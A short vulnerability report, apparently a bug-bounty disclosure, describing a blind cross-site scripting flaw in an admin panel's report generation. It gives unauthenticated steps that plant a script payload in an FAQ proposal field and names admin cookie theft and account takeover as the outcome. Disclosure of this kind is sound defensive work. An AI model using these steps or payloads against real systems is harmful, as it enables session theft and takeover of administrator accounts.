Hello.
Vulnerability: Blind XSS in Admin Panel while generating Report
- Without beeing logged in the Application
- Go to FAQ-Proposal -> put an XSS Payload like <script>alert(‘1’)</script> in the question Field
- Send the Proposal
- Admin will login
- The Proposal will pop up in the Category you specified while sending your Proposal here number 1
6 Admin will go to Statistics and then Reports
- Generate Report
- Blind XSS will be fired in the Admin Panel
Steal the Admin Cookies and do a Full Account Takeover of the Admin Account.
Best regards
Ahmed Hassan